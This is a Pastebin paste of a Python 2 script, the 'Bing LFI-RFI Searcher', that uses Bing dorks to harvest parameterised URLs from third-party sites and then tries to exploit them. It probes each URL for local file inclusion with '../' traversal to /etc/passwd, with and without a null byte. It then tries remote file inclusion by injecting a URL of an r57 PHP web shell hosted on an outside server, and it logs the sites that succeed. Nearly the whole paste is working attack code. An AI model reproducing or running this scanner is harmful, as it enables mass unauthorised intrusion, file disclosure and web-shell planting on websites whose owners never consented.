API tools faq
paste
Pain_R

Bing LFI / RFI Scanner

Pain_R
Mar 16th, 2014
659
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.38 KB | None | 0 0
raw download clone embed print report
  1. ##################################################
  2. # Bing LFI-RFI Searcher
  3. # Coded by Miyachung
  4. # Janissaries.Org
  5. # [email protected]
  6. ##################################################
  7. import threading
  8. import urllib2,urllib,socket
  9. import re
  10. import time
  11. import sys
  12. socket.setdefaulttimeout(5)
  13. def dorker(url,limit,shell):
  14.         try:
  15.               regex = re.compile("h3><a href=\"(.*?)\" h=")
  16.               path   = "../../../../../../../../../../../../../../etc/passwd"
  17.               pathn  = "../../../../../../../../../../../../../../etc/passwd%00"
  18.               conn = urllib2.urlopen(url)
  19.               data = conn.read()
  20.               links= regex.findall(data)
  21.               for link in links:
  22.                   link = link.strip()
  23.                   if re.search("=",link) and link.find("youtube") == -1 and link.find("forum") == -1 and link.find("google") == -1 and link.find("viewtopic") == -1 and link.find("showthread") == -1 and link.find("blog") == -1 and link.find("yahoo") == -1:
  24.                       link = link.split('=')
  25.                       link = link[0]+"="
  26.                       check= urllib2.urlopen(link+path,None,3).read()
  27.                       if re.search("root:x",check):
  28.                         a =  "#########################################################\r\n"
  29.                         a+= "[+]"+link+" /etc/passwd readed without null byte\r\n"
  30.                         a+= "[+]read -> "+link+path+"\r\n"
  31.                         a+= "[+]coded by miyachung\r\n"
  32.                         print a + "#########################################################"
  33.                         kaydet(a)
  34.                       else:
  35.                         check = urllib2.urlopen(link+pathn,None,3).read()
  36.                         if re.search("root:x",check):
  37.                             a = "#########################################################\r\n"
  38.                             a += "[+]"+link+" /etc/passwd readed with null byte!\r\n"
  39.                             a += "[+]read -> "+link+pathn+"\r\n"
  40.                             a += "[+]coded by miyachung\r\n"
  41.                             print a + "#########################################################"
  42.                             kaydet(a)
  43.                         else:
  44.                             print link+" hasn't got lfi vulnerability"
  45.                             checkrfi = urllib2.urlopen(link+shell,None,3).read()
  46.                             if re.search("safe_mode",checkrfi):
  47.                                 a = "#########################################################\r\n"
  48.                                 a+= "[+]remote file include vulnerability works!\r\n"
  49.                                 a+= "[+]shell -> "+link+shell+"\r\n"
  50.                                 a+= "[+]coded by miyachung\r\n"
  51.                                 print a + "#########################################################"
  52.                                 kaydet(a)
  53.                             else:
  54.                                 print link+" hasn't got rfi vulnerability"
  55.         except urllib2.URLError:
  56.             print link+" urlerror"
  57.             pass
  58.         except urllib2.HTTPError:
  59.             print link+" httperror"
  60.             pass
  61.         except socket.timeout:
  62.             print link+" timeout"
  63.             pass
  64.         except:
  65.             pass
  66.  
  67.         limit.release()
  68. def kaydet(yazi):
  69.     ac = open('results.txt','ab')
  70.     ac.write(yazi)
  71.     ac.close()
  72. class Exploiter:
  73.     def main(self,dorks,thread,shell):
  74.         for dork in open(dorks):
  75.             dork  = dork.strip()
  76.             i     = 1
  77.             limit = threading.BoundedSemaphore(value=thread)
  78.             tasks = []
  79.             while i <= 451:
  80.                   limit.acquire()
  81.                   th = threading.Thread(target=dorker,args=("http://www.bing.com/search?q="+urllib.quote_plus(dork)+"&count=50&first="+str(i)+"&FORM=PERE",limit,shell,))
  82.                   tasks.append(th)
  83.                   th.start()
  84.                   i += 50
  85.             for t in tasks:
  86.                 t.join()
  87. try:
  88.     exploit = Exploiter()
  89.     exploit.main(sys.argv[1],int(sys.argv[2]),"http://www.xfocus.net/tools/200608/r57.txt?")
  90. except IndexError:
  91.     print "# Bing LFI-RFI Searcher"
  92.     print "# Coded by Miyachung"
  93.     print "# Janissaries.Org"
  94.     print "Usage: python searcher.py DORKLISTFILE THREAD"
  95.     print "Examp: python searcher.py dorks.txt 10"
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!